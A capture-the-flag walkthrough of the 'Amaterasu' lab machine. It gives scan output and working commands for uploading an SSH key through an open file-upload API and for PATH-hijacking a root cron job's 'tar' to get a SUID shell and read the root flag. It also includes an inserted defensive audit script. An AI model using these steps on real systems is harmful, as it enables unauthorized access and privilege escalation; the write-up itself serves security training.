In this walkthrough, we will be going through the Amaterasu room from Proving Grounds. The room is rated Easy on the platform: initial access comes from abusing the Python File Server API, and privilege escalation to root requires PATH hijacking. So, let’s get started without any delay.
Machine Info:

| Field | Value |
| --- | --- |
| Title | Amaterasu |
| IP address | 192.168.196.249 |
| Difficulty | Easy |
| OS | Linux |
| Description | Amaterasu is an easy machine that is designed to test the enumeration skills of the user. Initial access is taken via the Python File Server API, followed by a PATH hijacking privilege escalation attack to get root. |
Enumeration:
- I started off with my regular aggressive nmap scan and found only one port open – 21 (FTP). That was a bit strange.

$ sudo nmap -A 192.168.196.249
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-12 23:14 IST
Nmap scan report for 192.168.196.249
Host is up (0.18s latency).
Not shown: 992 filtered ports
PORT      STATE  SERVICE          VERSION
21/tcp    open   ftp              vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.45.221
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| vulners:
|   cpe:/a:vsftpd:vsftpd:3.0.3:
|       PRION:CVE-2021-3618    5.8    https://vulners.com/prion/PRION:CVE-2021-3618
|_      PRION:CVE-2021-30047   5.0    https://vulners.com/prion/PRION:CVE-2021-30047
22/tcp    closed ssh
111/tcp   closed rpcbind
139/tcp   closed netbios-ssn
443/tcp   closed https
445/tcp   closed microsoft-ds
2049/tcp  closed nfs
10000/tcp closed snet-sensor-mgmt
Aggressive OS guesses: Linux 2.6.32 (88%), Linux 2.6.32 or 3.10 (88%), Linux 2.6.39 (88%), Linux 3.10 - 3.12 (88%), Linux 3.4 (88%), Synology DiskStation Manager 5.1 (87%), Linux 4.9 (87%), Linux 3.5 (87%), Linux 4.2 (87%), Linux 4.4 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Unix

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   174.74 ms 192.168.45.1
2   174.70 ms 192.168.45.254
3   174.78 ms 192.168.251.1
4   176.10 ms 192.168.196.249

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.61 seconds
- Next, I performed a full TCP port scan and found three additional unknown services on high port numbers – 25022, 33414 and 40080.
sudo nmap -sS -T5 -p- 192.168.196.249
Enumerating Port 21 (FTP)
- I started my enumeration with FTP and logged into the server with the “anonymous” credentials; however, I was unable to list the directories inside it as the listing kept timing out.
ftp 192.168.196.249
Enumerating Port 33414 & 40080
- Next, I enumerated port 33414. It was running a web server, but I found nothing on the index page. We will come back to it later. Let’s move on for now.
- Port 40080 serves a static web page related to Mozilla. I found nothing interesting in the page source or in the site’s contents.
- Next, I fired gobuster at the servers on ports 40080 and 33414 to reveal any hidden directories. Nothing interesting turned up on 40080, but the scan of 33414 revealed two interesting endpoints – /help and /info.
gobuster dir -u http://192.168.196.249:40080/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -t 20
$ gobuster dir -u http://192.168.196.249:33414/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.196.249:33414/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/12 23:35:24 Starting gobuster in directory enumeration mode
===============================================================
/help                 (Status: 200) [Size: 137]
/info                 (Status: 200) [Size: 98]
===============================================================
2024/01/12 23:48:00 Finished
===============================================================
- Looking at the discovered endpoints on port 33414 reveals a “Python File Server REST API” on the server. With its help, we can list any directory on the server and upload files to it. Bingo!
- In the background, I had also started a full aggressive scan on the newly found ports, and the results show that port 25022 is running SSH. Ports 33414 and 40080 we have already explored.
sudo nmap -A -p 25022,33414,40080 192.168.196.249
- Continuing our enumeration through the API endpoint, we can look into the home directory of user “alfredo” and also its .ssh directory. That means that if we can upload our public key into that folder using the API’s upload functionality, we can log in to the server as alfredo over SSH.
Initial Access:
- To test our hypothesis, let’s first upload a text file onto the server using the command below.
curl -i -L -X POST -H "Content-Type: multipart/form-data" -F file="@/home/wh1terose/CTF/PG-Play/machines/Amaterasu/test.txt" -F filename="/home/alfredo/test.txt" http://192.168.196.249:33414/file-upload
- The above command gives us a positive result: we were able to upload a file onto the server using the File Server API.
- Now, let’s generate an SSH key pair using ssh-keygen and save it in the current working directory.
ssh-keygen
- Now we will upload our RSA public key into the .ssh folder of user alfredo. I hit a small hiccup here while uploading, as the API only accepts certain extensions. So, I renamed my local file to id_rsa.pub.txt while keeping the uploaded file name as authorized_keys. The command below gives a successful hit.
curl -i -L -X POST -H "Content-Type: multipart/form-data" -F file="@/home/wh1terose/CTF/PG-Play/machines/Amaterasu/id_rsa.pub.txt" -F filename="/home/alfredo/.ssh/authorized_keys" http://192.168.165.249:33414/file-upload
- With the help of our earlier generated RSA private key, I logged into the server via SSH, thus gaining the initial foothold and capturing the local flag.

chmod 600 id_rsa
ssh -i id_rsa alfredo@192.168.196.249 -p 25022
Privilege Escalation:
- I performed some post-compromise enumeration on the target and found one interesting cron job entry. A script named “backup-flask.sh” runs as root for about 30 seconds. Looking inside the file, I found that it first prepends the restapi folder in alfredo’s home directory to the PATH variable and then uses tar to create a backup of the files inside that directory. That means we can perform a PATH hijacking attack on the “tar” binary, since the script does not call it by absolute path. Once the cron job executes the script, our malicious tar will run in place of the original one, giving us root on the system.

cat /etc/crontab
ls -l /usr/local/bin/backup-flask.sh
cat /usr/local/bin/backup-flask.sh
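From the defender’s side, both mistakes in that cron script are mechanically detectable: a PATH that is extended with a user-writable directory, and a privileged command invoked by bare name. The following is an added example, not part of the original post: a small static audit that flags both patterns in a shell script. The sample script it scans is a constructed stand-in modelled on the description above, not the real backup-flask.sh, and the list of trusted PATH entries is an assumption.

```python
import re
import shlex

# Constructed sample script, modelled on the description of backup-flask.sh (not the real file).
SAMPLE_SCRIPT = """#!/bin/bash
# Nightly backup of the REST API directory
export PATH=/home/alfredo/restapi:$PATH
cd /home/alfredo/restapi
tar -czf /var/backups/restapi.tgz .
/bin/chown root:root /var/backups/restapi.tgz
"""

# Assumption: PATH entries outside these system directories are suspicious in a root cron script.
TRUSTED_PATH_DIRS = {"/usr/local/sbin", "/usr/local/bin", "/usr/sbin",
                     "/usr/bin", "/sbin", "/bin"}

# Shell keywords/builtins that never resolve through PATH, so they are not hijackable this way.
SHELL_BUILTINS = {"cd", "export", "echo", "exit", "set", "umask", "if", "then",
                  "else", "elif", "fi", "for", "while", "do", "done", "return"}

PATH_ASSIGNMENT = re.compile(r"^(?:export\s+)?PATH=(.*)$")


def audit_script(text: str) -> list[tuple[int, str, str]]:
    """Return (line_number, finding_type, detail) for every risky construct found.

    finding types:
      path-entry       a PATH entry that is empty, relative, or outside TRUSTED_PATH_DIRS
      relative-command an external command invoked without an absolute path
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue

        match = PATH_ASSIGNMENT.match(line)
        if match:
            for entry in match.group(1).split(":"):
                if entry.startswith("$"):        # "$PATH" / "${PATH}": keeps existing value
                    continue
                if entry not in TRUSTED_PATH_DIRS:  # "" and "." mean the current directory
                    findings.append((lineno, "path-entry", entry))
            continue

        try:
            words = shlex.split(line, comments=True)
        except ValueError:
            continue  # unbalanced quotes; a real linter would report this too
        # Skip leading VAR=value prefixes such as "LC_ALL=C tar ..."
        while words and "=" in words[0] and not words[0].startswith("/"):
            words.pop(0)
        if not words or words[0] in SHELL_BUILTINS:
            continue
        if not words[0].startswith("/"):
            findings.append((lineno, "relative-command", words[0]))
    return findings


def report(text: str) -> str:
    """Format the findings of audit_script() as one line per issue."""
    lines = [f"line {n}: {kind} -> {detail!r}" for n, kind, detail in audit_script(text)]
    return "\n".join(lines) if lines else "no findings"


if __name__ == "__main__":
    print(report(SAMPLE_SCRIPT))
```

Either finding on its own is survivable; together they are the privilege escalation on this box, so an alert rule should raise the severity when a root-run script both widens PATH and calls a bare command. The same scan can be pointed at every file referenced from /etc/crontab and /etc/cron.d, and the fix it points to is the conventional one: call `/bin/tar` (or set `PATH` to the system directories only) in anything that cron runs as root.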
- I tried to make a copy of the bash binary and was able to get it executed as root, but for some reason I didn’t get root. Earlier, I had also tried to get a reverse shell, but the machine was not calling back to my local box for some reason. Ideally, it should have worked, but it didn’t.

echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > tar
chmod 777 tar
export PATH=/home/alfredo/restapi:$PATH
echo $PATH
- So, I used the same technique to just read the root flag and completed the challenge.

echo -ne '#!/bin/bash\n cat /root/proof.txt > /tmp/flag.txt' > tar
chmod 777 tar
export PATH=/home/alfredo/restapi:$PATH
echo $PATH
Conclusion:
So that was “Amaterasu” for you. We started off with a regular nmap scan and found a few ports open. We enumerated the web server running on port 33414 and found a Python File Server REST API v2.5 installation, then abused it to upload my SSH key into alfredo’s .ssh directory, which gave us initial access. Next, we found a backup-flask.sh script among the cron jobs that was creating a backup of the restapi directory using tar, and abused the bare tar invocation with the PATH hijacking technique to get root. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.